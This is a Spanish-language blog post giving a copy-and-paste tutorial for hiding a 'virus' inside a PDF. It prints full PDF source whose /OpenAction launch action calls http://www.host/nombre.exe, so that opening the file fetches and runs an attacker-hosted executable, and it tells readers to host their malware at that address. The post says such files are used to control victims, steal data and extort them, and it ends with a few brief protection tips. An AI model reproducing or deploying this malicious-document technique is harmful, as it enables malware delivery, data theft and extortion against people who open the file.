:::: MENU ::::

  • Aprende a usar Kali Linux!

  • Usos del Metasploit!

  • Hacking Ético

domingo, 3 de julio de 2016

[Windows] Cómo ocultar un Virus en un documento PDF sin programas.

,
Muy buenas, aquí les mostraré brevemente cómo ocultar un virus dentro de un documento "Amigable".

Estos métodos son usados por algunas personas maliciosas para tener el control de un usuario desde cualquier parte, robar su información, descargarle sus archivos, crearle otros, luego extorsionarlo entre otras actividades delictivas.

Normalmente estos PDF viene camuflados como "Guías de Hacking" o cosas demasiado buenas para ser verdad (OJO que no todas estas guías traerán virus claro está).

Este tutorial en realidad será muy sencillo, copiar y pegar un código, y editarle ciertas cosas.

Primero antes que nada creamos un archivo .txt en cualquier parte de nuestro equipo y le ubicaremos el siguiente código:



%PDF-1.1
1 0 obj
<<
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /OpenAction 8 0 R
>>
endobj
2 0 obj
<<
 /Type /Outlines
 /Count 0
>>
endobj
3 0 obj
<<
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
>>
endobj
4 0 obj
<<
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources
 << /ProcSet 6 0 R
    /Font << /F1 7 0 R >>
 >>
>>
endobj
5 0 obj
<< /Length 46 >>
stream
BT
/F1 24 Tf
100 700 Td
(Aquí se deberá poner todo el texto que llevará el PDF)Tj
ET
endstream
endobj
6 0 obj
[/PDF /Text]
endobj
7 0 obj
<<
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
>>
endobj
8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (http://www.host/nombre.exe)
 >>
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000401 00000 n
0000000505 00000 n
0000000662 00000 n
trailer
<<
 /Size 9
 /Root 1 0 R
>>
startxref
751
%%EOF

Ahora veremos que las lineas que se van a modificar (Principalmente, en realidad puedes modificar lo que quieras), estarán en azul.

Bien, cuando tengamos todo editado guardaremos ese ,txt como un .pdf, de esta manera se creará un PDF con el contenido que le hemos editado en el código.

En el lugar donde dice www.host,etc.... deberán de ubicar un host web donde hayan alojado el archivo Virus (Pronto habrá un tutorial de eso).

¿Cómo me protejo de esto?

 * Ver a qué páginas intenta acceder algún archivo que descarguemos.

* Tener un buen Firewall.

* No descargar cualquier archivo que prometa grandes cosas por Internet,

* De ser posible nunca manejar archivos de Hacking en tu computadora de uso normal, mejor tener todo en una máquina virtual.

- Cuculmeca


0 comentarios:

Publicar un comentario

A call-to-action text Contact us

Blogroll

About